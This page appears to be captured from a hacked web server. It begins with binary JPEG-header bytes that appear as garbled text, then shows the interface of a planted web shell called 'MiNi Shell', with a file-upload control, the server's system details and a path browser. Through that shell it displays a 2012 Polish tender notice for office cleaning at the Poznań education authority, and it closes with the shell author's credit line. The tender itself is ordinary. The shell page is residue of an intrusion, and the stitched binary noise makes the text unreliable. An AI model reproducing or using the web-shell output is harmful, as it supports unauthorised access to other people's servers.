JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/self/root/proc/self/root/home/vmanager/www/common/web/tenders/20121109/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //proc/self/root/proc/self/root/home/vmanager/www/common/web/tenders/20121109/442680-N-2012.html

<p class="kh_header"><b>Poznań: Usługa sprzątania w Kuratorium Oświaty w Poznaniu oraz w jego delegaturach w Kaliszu, Koninie, Lesznie i Pile w 2013 roku.</b><br>
<b>Numer ogłoszenia: 442680 - 2012; data zamieszczenia: 09.11.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Kuratorium Oświaty w Poznaniu , ul. Kościuszki 93, 61-716 Poznań, woj. wielkopolskie, tel. 061 8541504, faks 061 8523169.</p>
<ul class="kh_indent_1">
</ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja rządowa terenowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Usługa sprzątania w Kuratorium Oświaty w Poznaniu oraz w jego delegaturach w Kaliszu, Koninie, Lesznie i Pile w 2013 roku..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest usługa sprzątania, która będzie obejmować kompleksowe sprzątanie pomieszczeń biurowych, socjalnych, sanitarnych i korytarzy w Kuratorium Oświaty zlokalizowanych przy ul. Kościuszki 93 i pl. Wolności 17 w Poznaniu oraz w jego delegaturach w Kaliszu, Koninie, Lesznie i Pile.  Usługa wykonywana będzie w dni robocze od poniedziałku do piątku, po godzinach pracy Urzędu, nie później jednak niż do 22.00. Przedmiot zamówienia składa się z 6 części, z których każda objęta będzie odrębnym postępowaniem w celu dokonania wyboru najkorzystniejszej oferty. Zakres zamówienia:
I)Część nr 1 - usługa sprzątania obejmuje pomieszczenia biurowe, socjalne i korytarz w siedzibie Kuratorium Oświaty w Poznaniu, ul. Kościuszki 93, 61-716 Poznań, w budynku Wielkopolskiego Urzędu Wojewódzkiego o powierzchni całkowitej 764,44 m2, w tym:
1)pomieszczenia biurowe w budynku B:
a)na III piętrze - pokoje od nr 302 do nr 306 oraz od nr 309 do nr 340,
b)na II piętrze - pokoje od nr 224 do nr 228,
c)na niskim parterze - pokój nr NP-7,
o powierzchni łącznej 636,65 m2;
2)pomieszczenie socjalne na III piętrze w budynku B nr 301 o powierzchni 14,71 m2;
3)pomieszczenia biurowe w budynku C:
a)na I piętrze - pokój nr 107 o powierzchni 35,10 m2,
b)na niskim parterze - salka konferencyjna nr 9 o powierzchni 54,43 m2,
c)korytarz o powierzchni 23,55 m2.
II)Część nr 2 - usługa sprzątania obejmuje pomieszczenia biurowe, socjalne i sanitarne Kuratorium Oświaty, pl. Wolności 17, 61-739 Poznań, w budynku Wielkopolskiego Urzędu Wojewódzkiego na I piętrze, o powierzchni całkowitej 268,74 m2, w tym:
1)pomieszczenia biurowe - pokoje nr: 202, 203, 204, 209, 210, 212, 213, 214 o powierzchni łącznej 206,16 m2 oraz hall (poczekalnia) o powierzchni 39,06 m2;
2)pomieszczenie socjalne nr 205 o powierzchni 7,20 m2;
3)pomieszczenia sanitarne nr 206 i 208 o powierzchni łącznej 16,32 m2.
III)Część nr 3 - usługa sprzątania obejmuje pomieszczenia biurowe, socjalne, sanitarne i korytarz w Delegaturze w Koninie, ul. Św. Maksymiliana Kolbe 3, 62-510 Konin, w budynku Banku Gospodarki Żywnościowej Spółka Akcyjna na II piętrze, o powierzchni całkowitej 204,28 m2, w tym:
1)pomieszczenia biurowe - pokoje 208-209 oraz 215-223 o powierzchni łącznej 157,80 m2;
2)pomieszczenie socjalne nr 207 o powierzchni 6,07 m2;
3)pomieszczenia sanitarne nr P3 i P4 o powierzchni łącznej 9,01 m2;
4)korytarz o powierzchni 31,40 m2.
IV)Część nr 4 - usługa sprzątania obejmuje pomieszczenia biurowe w Delegaturze w Lesznie, pl. Kościuszki 4, 64-100 Leszno, w budynku A Wielkopolskiego Urzędu Wojewódzkiego na I piętrze - pokoje od nr 102 do nr 110 oraz od nr 115 do nr 117, o łącznej powierzchni 218,18 m2.
V)Część nr 5 - usługa sprzątania obejmuje pomieszczenia biurowe w Delegaturze w Pile, ul. Dzieci Polskich 26, 64-920 Piła, w budynku Wielkopolskiego Urzędu Wojewódzkiego na I piętrze - pokoje od nr 42 do nr 50, o powierzchni łącznej 126,35 m2.
VI)Cześć nr 6 - usługa sprzątania obejmuje pomieszczenia biurowe, socjalne, sanitarne i korytarz w Delegaturze w Kaliszu, ul. Kordeckiego 19, 62-800 Kalisz, w budynku Specjalnego Ośrodka Szkolno-Wychowawczego na parterze o powierzchni całkowitej 625,11 m2, w tym:
1)pomieszczenia biurowe - pokoje od nr 2 do nr 18, 20 i 26 o powierzchni łącznej 375,02 m2;
2)pomieszczenie biurowo-magazynowe nr 1, 19, 21 i 25 o łącznej powierzchni 50,57 m2;
3)salka konferencyjna nr 23 i 24 o łącznej powierzchni 41,64 m2; 
4)pomieszczenia socjalne o powierzchni 10,35 m2;
5)dwa pomieszczenia sanitarne o powierzchni łącznej 21,88 m2;
6)korytarz o powierzchni 125,65 m2.			
Szczegółowy opis przedmiotu zamówienia zawiera Specyfikacja Istonych Warunków Zamówienia..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Zamawiający dopuszcza możliwość udzielenia zamówień uzupełniających, w okresie 3 lat od udzielenia zamówienia podstawowego dotychczasowemu wykonawcy usług, stanowiących nie więcej niż 50% wartości zamówienia podstawowego i polegających na powtórzeniu tego samego rodzaju zamówienia, na podstawie art. 67 ust. 1 pkt 6 ustawy Pzp</li></ul>
<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 90.91.00.00-9.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 6.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> .</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna powyższy warunek za spełniony, na podstawie złożonego przez wykonawcę oświadczenia, sporządzonego według wzoru określonego w załączniku nr 2 do SIWZ.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna powyższy warunek za spełniony, jeżeli wykonawca wykaże, że w okresie ostatnich trzech lat przed upływem terminu składania ofert wykonał co najmniej trzy usługi sprzątania, o łącznej wartości nie mniejszej niż 20 000 zł w budynkach użyteczności publicznej, polegające na sprzątaniu pomieszczeń biurowych, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, podając ich rodzaj i wartość, daty i miejsca ich wykonania oraz załączając jednocześnie dokumenty potwierdzające, że usługi zostały wykonane lub są wykonywane należycie.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna powyższy warunek za spełniony, na podstawie złożonego przez wykonawcę oświadczenia, sporządzonego według wzoru określonego w załączniku nr 2 do SIWZ.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna powyższy warunek za spełniony, na podstawie złożonego przez wykonawcę oświadczenia, sporządzonego według wzoru określonego w załączniku nr 2 do SIWZ.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna powyższy warunek za spełniony, na podstawie złożonego przez wykonawcę oświadczenia, sporządzonego według wzoru określonego w załączniku nr 2 do SIWZ.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Dokumenty potwierdzające posiadanie uprawnień/pełnomocnictw osób składających ofertę o ile nie wynika to z przedstawionych dokumentów rejestrowych.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający, stosownie do przepisu art. 144 ust. 1 ustawy Pzp, dopuszcza możliwość dokonania zmiany postanowień zawartej umowy w przypadku uzasadnionej konieczności zmiany pracowników lub osoby nadzorującej zapewniających należyte wykonanie usługi.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://ko.poznan.ibip.pl/public/<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Kuratorium Oświaty w Poznaniu, ul. Kościuszki 93, 61-716 Poznań, pokój 313, bud. B lub na stronie internetowej http://ko.poznan.ibip.pl/public/.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 19.11.2012 godzina 12:30, miejsce: Kuratorium Oświaty w Poznaniu, ul. Kościuszki 93, 61-716 Poznań, III piętro, budynek B - kancelaria..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Usługa sprzątania pomieszczeń biurowych, socjalnego i korytarza w siedzibie Kuratorium Oświaty w Poznaniu, ul. Kościuszki 93, 61-716 Poznań.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Usługa sprzątania obejmuje pomieszczenia biurowe, socjalne i korytarz w siedzibie Kuratorium Oświaty w Poznaniu, ul. Kościuszki 93, 61-716 Poznań, w budynku Wielkopolskiego Urzędu Wojewódzkiego o powierzchni całkowitej 764,44 m2, w tym:
1)pomieszczenia biurowe w budynku B:
a)na III piętrze - pokoje od nr 302 do nr 306 oraz od nr 309 do nr 340,
b)na II piętrze - pokoje od nr 224 do nr 228,
c)na niskim parterze - pokój nr NP-7,
o powierzchni łącznej 636,65 m2;
2)pomieszczenie socjalne na III piętrze w budynku B nr 301 o powierzchni 14,71 m2;
3)pomieszczenia biurowe w budynku C:
a)na I piętrze - pokój nr 107 o powierzchni 35,10 m2,
b)na niskim parterze - salka konferencyjna nr 9 o powierzchni 54,43 m2,
c)korytarz o powierzchni 23,55 m2..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 90.91.00.00-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Usługa sprzątania pomieszczeń biurowych, socjalnego i sanitarnych Kuratorium Oświaty, pl. Wolności 17, 61-739 Poznań.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Usługa sprzątania obejmuje pomieszczenia biurowe, socjalne i sanitarne Kuratorium Oświaty, pl. Wolności 17, 61-739 Poznań, w budynku Wielkopolskiego Urzędu Wojewódzkiego na I piętrze, o powierzchni całkowitej 268,74 m2, w tym:
1)pomieszczenia biurowe - pokoje nr: 202, 203, 204, 209, 210, 212, 213, 214 o powierzchni łącznej 206,16 m2 oraz hall (poczekalnia) o powierzchni 39,06 m2;
2)pomieszczenie socjalne nr 205 o powierzchni 7,20 m2;
3)pomieszczenia sanitarne nr 206 i 208 o powierzchni łącznej 16,32 m2..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 90.91.00.00-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Usługa sprzątania pomieszczeń biurowych, socjalnego, sanitarnych i korytarza w Delegaturze w Koninie, ul. Św. Maksymiliana Kolbe 3, 62-510 Konin.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Usługa sprzątania obejmuje pomieszczenia biurowe, socjalne, sanitarne i korytarz w Delegaturze w Koninie, ul. Św. Maksymiliana Kolbe 3, 62-510 Konin, w budynku Banku Gospodarki Żywnościowej Spółka Akcyjna na II piętrze, o powierzchni całkowitej 204,28 m2, w tym:
1)pomieszczenia biurowe - pokoje 208-209 oraz 215-223 o powierzchni łącznej 157,80 m2;
2)pomieszczenie socjalne nr 207 o powierzchni 6,07 m2;
3)pomieszczenia sanitarne nr P3 i P4 o powierzchni łącznej 9,01 m2;
4)korytarz o powierzchni 31,40 m2..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 90.91.00.00-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Usługa sprzątania pomieszczeń biurowych w Delegaturze w Lesznie, pl. Kościuszki 4, 64-100 Leszno.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Usługa sprzątania obejmuje pomieszczenia biurowe w Delegaturze w Lesznie, pl. Kościuszki 4, 64-100 Leszno, w budynku A Wielkopolskiego Urzędu Wojewódzkiego na I piętrze - pokoje od nr 102 do nr 110 oraz od nr 115 do nr 117, o łącznej powierzchni 218,18 m2.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 90.91.00.00-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> Usługa sprzątania pomieszczeń biurowych w Delegaturze w Pile, ul. Dzieci Polskich 26, 64-920 Piła.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Usługa sprzątania obejmuje pomieszczenia biurowe w Delegaturze w Pile, ul. Dzieci Polskich 26, 64-920 Piła, w budynku Wielkopolskiego Urzędu Wojewódzkiego na I piętrze - pokoje od nr 42 do nr 50, o powierzchni łącznej 126,35 m2.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 90.91.00.00-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 6 <b>NAZWA:</b> Usługa sprzątania pomieszczeń biurowych, socjalnego, sanitarnych i korytarza w Delegaturze w Kaliszu, ul. Kordeckiego 19, 62-800 Kalisz,.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Usługa sprzątania obejmuje pomieszczenia biurowe, socjalne, sanitarne i korytarz w Delegaturze w Kaliszu, ul. Kordeckiego 19, 62-800 Kalisz, w budynku Specjalnego Ośrodka Szkolno-Wychowawczego na parterze o powierzchni całkowitej 625,11 m2, w tym:
1)pomieszczenia biurowe - pokoje od nr 2 do nr 18, 20 i 26 o powierzchni łącznej 375,02 m2;
2)pomieszczenie biurowo-magazynowe nr 1, 19, 21 i 25 o łącznej powierzchni 50,57 m2;
3)salka konferencyjna nr 23 i 24 o łącznej powierzchni 41,64 m2; 
4)pomieszczenia socjalne o powierzchni 10,35 m2;
5)dwa pomieszczenia sanitarne o powierzchni łącznej 21,88 m2;
6)korytarz o powierzchni 125,65 m2..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 90.91.00.00-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 10.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com